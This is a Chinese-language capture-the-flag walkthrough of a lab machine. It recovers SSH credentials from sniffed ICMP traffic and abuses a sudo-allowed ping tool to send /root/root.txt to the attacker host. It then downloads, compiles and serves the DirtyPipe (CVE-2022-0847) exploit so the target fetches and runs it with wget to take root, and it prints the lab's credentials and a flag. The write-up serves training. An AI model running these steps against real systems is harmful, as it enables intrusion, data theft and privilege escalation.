部署环境
提供镜像文件后,直接用虚拟机打开即可,kali攻击机用VMware打开即可,靶机用vbox打开即可
kali攻击机ip地址:桥接自动获取ip
靶机ip地址:(桥接自动获取ip)
提示信息:
CTF
目标: user.txt和root.txt
信息收集
扫描主机
arp-scan -l
发现存活主机192.168.1.10
扫描端口
扫描靶机开放的服务端口
nmap -A -T4 -p- 192.168.1.10
发现还是只有22端口和80端口开放
Web渗透
访问web端口
http://192.168.1.10/
发现就是一个ping的界面,看看源码有什么提示信息
提示说传输ICMP数据包,那就按照提示看看icmp包里传输了什么
1、攻击机上开启tcpdump抓icmp包并保存
tcpdump -i eth0 icmp -w icmp
2、访问页面,让后台直接执行Ping命令(就访问就行,其他的不用做啥操作)
3、执行完成后在攻击机上手动Ctrl+c结果抓包,
4、使用wireshark加载包查看传输内容
接下来就仔细看看这个流分包里有什么东西
我们可以看到两次传输的包内有username和pasword内容,我们看一下各个包在
那就在这里发现了用户名,那就看看密码
这样也就拿到了密码P!ngM3
用户名:pinger
密 码:P!ngM3
那就直接上ssh看一下
发现getshell成功,那就搜集下主机中的敏感信息
ls
cat user.txt
这就拿到了第一个任务目标
HMV{ICMPisSafe}
继续看一下有什么敏感信息
sudo -l
发现可以使用root身份去执行sendfilebyping命令,我们先看看这个程序是做什么的
cat /usr/local/sbin/sendfilebyping
这个程序是使用ping命令来传输文件,我们试试
1、攻击机打开tcpdump抓icmp包并输出为file.pacpng
tcpdump -i eth0 icmp -w file.pacpng
2、靶机上执行sendfilebyping命令,这里试着猜测/root/目录下有一个root.txt文件
sudo /usr/local/sbin/sendfilebyping 192.168.1.8 /root/root.txt
一共发了21个包,现在手动关闭攻击机上的tcpdump,
使用wireshark打开file.pacpng文件
会发现在这里,每一个数据包都有一个字符
这就是最终的flag,本人懒,,,就不去找了,大家到时候自己实验看看就行~
虽然现在已经把两个任务都完成,但是这个提权还是不能少,我们直接上提权
提权
查看一下内核版本号
此内核版本存在CVE-2022-0847-DirtyPipe漏洞,尝试复现这个漏洞
下载exp
git clone https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit.git
下载完成开始编译
cd CVE-2022-0847-DirtyPipe-Exploit
ls
chmdo +x compile.sh
./compile.sh
ls
编译完成,现在将exp上传到靶机中执行。
1、攻击机上开启HTTP服务
python3 -m http.server
2、靶机下载exp添加可执行权限并执行
cd /tmp
wget http://192.168.1.8:8000/exploit
chmod +x exploit
./exploit
从这步开始由于时间问题,我就直接拿大佬的截图直接上来了,大家可以直接关注他的公众号去看下
提示找不到GLIBC_2.33,原因是攻击机上的GLIBC是高版本的,对靶机上的版本检查只有2.30这个版本,随后我从其他低版本的机器上编译了exp并上传到了靶机上。(已放到百度盘)
./exp
根据提示,exp修改了passwd文件中的root密码,修改后的密码为aaron,验证一下
su root
提权成功,来看下flag
cd /root
ls
cat root.txt
结束~